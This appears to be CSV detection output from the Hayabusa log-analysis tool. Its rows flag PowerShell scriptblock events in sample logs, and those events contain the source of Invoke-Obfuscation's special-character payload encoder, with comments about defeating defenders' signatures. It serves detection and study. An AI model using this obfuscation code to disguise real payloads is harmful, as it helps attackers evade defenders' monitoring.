+${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? \""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. $NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.279 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? \""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. $NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; 